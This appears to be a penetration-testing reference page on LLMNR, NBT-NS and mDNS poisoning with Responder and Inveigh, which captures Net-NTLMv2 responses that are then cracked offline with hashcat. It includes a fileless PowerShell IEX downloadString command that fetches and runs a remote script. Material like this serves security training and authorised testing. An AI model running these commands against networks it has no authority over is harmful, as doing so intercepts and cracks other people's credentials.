PRIMARY CATEGORY → NTLM

Theory

An operator forces or coerces a remote machine into authenticating to a rogue server under their control, typically by answering the victim's LLMNR, NBT-NS or mDNS name lookups (which is what Responder and Inveigh do), and captures the Net-NTLMv2 response carried in the NTLM Type 3 message (AUTHENTICATE_MESSAGE). What is captured is not the NT hash itself: it is an HMAC-MD5, keyed with a value derived from the NT hash, over the server challenge (chosen by the rogue server) and a client-supplied blob. It therefore cannot be used for pass-the-hash, but every candidate password can be tested against it offline, which is what the cracking section below does.


Abusing from UNIX-like

Responder

Setup
git clone https://github.com/lgandx/Responder Responder
cd Responder && python3 -m venv .venv
. .venv/bin/activate && pip3 install -r requirements.txt
Usage
sudo python3 Responder.py --interface <INTERFACE>
Responder needs root to bind its listeners (SMB, HTTP and the LLMNR/NBT-NS/mDNS poisoners). Captured Net-NTLMv2 responses are printed once per client and saved under logs/ already in hashcat format.
To confirm that the segment actually carries LLMNR/NBT-NS queries before poisoning anything, run analyze mode, which listens without answering:
sudo python3 Responder.py --interface <INTERFACE> -A

Abusing from Windows

Inveigh.ps1

Setup
  • Fileless
IEX (New-Object Net.WebClient).downloadString('https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1')
  • Touching Disk
IWR -UseBasicParsing -Uri 'https://github.com/Kevin-Robertson/Inveigh/raw/refs/heads/master/Inveigh.ps1' -OutFile '.\Inveigh.ps1'
Import-Module .\Inveigh.ps1
Usage
Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -mDNS Y
Captures stay in the memory of the PowerShell session; dump them and stop the listeners with:
Get-Inveigh -NTLMv2
Stop-Inveigh
Inveigh.exe

.\Inveigh.exe
Run it from an elevated prompt: the C# port sniffs with raw sockets and needs administrator rights.

Cracking Net-NTLMv2 Hashes

Hashcat

Hashcat Type → 5600

hashcat -O --attack-mode 0 --hash-type 5600 <HASH_FILE> <WORDLIST>
hashcat --hash-type 5600 <HASH_FILE> --show
<HASH_FILE> holds the lines exactly as Responder or Inveigh wrote them (user::DOMAIN:challenge:NTProofStr:blob). -O selects the optimized kernels, which are faster but cap the candidate password length; drop it if long passwords are in scope. Add --force only to override a driver or hardware warning, it does not help cracking otherwise. --show reads the potfile and prints already-cracked entries next to their hashes without cracking again.